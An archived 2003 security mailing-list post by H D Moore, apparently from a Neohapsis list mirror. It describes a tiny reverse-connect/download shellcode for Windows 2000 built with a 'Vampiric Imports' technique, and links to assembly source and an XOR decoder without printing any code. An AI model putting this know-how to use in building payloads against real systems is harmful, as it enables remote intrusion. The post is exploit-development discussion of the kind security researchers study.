|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Tiny Windows 2000 Reverse Connect
From: H D Moore (sflist
digitaloffense.net)
Date: Mon Oct 06 2003 - 16:11:19 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Most operating systems ship with a massive number of files that have not
been modified since the initial release, these files can be used to
develop really small service-pack independent shellcode. The trick is to
use a single LoadLibraryA call to get the module base, then call the IAT
functions directly using hardcoded offsets. The result is a
reverse-connect/download-shellcode payload that is 179 bytes and works on
every service pack of Windows 2000 :)
I managed to get a null-free version right around 200 bytes, but any
really small XOR encoder will work as well. This technique, dubbed
'Vampiric Imports' is implemented in the following code:
- http://metasploit.com/sc/win2000_vampiric_connector.asm
A tiny XOR decoder based on noir's fnstenv getpc is online at:
- http://metasploit.com/sc/x86_fnstenv_xor_byte.asm
It should be possible to build similar payloads that work with NT 4.0,
Windows XP, and Windows 2003...
-HD
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]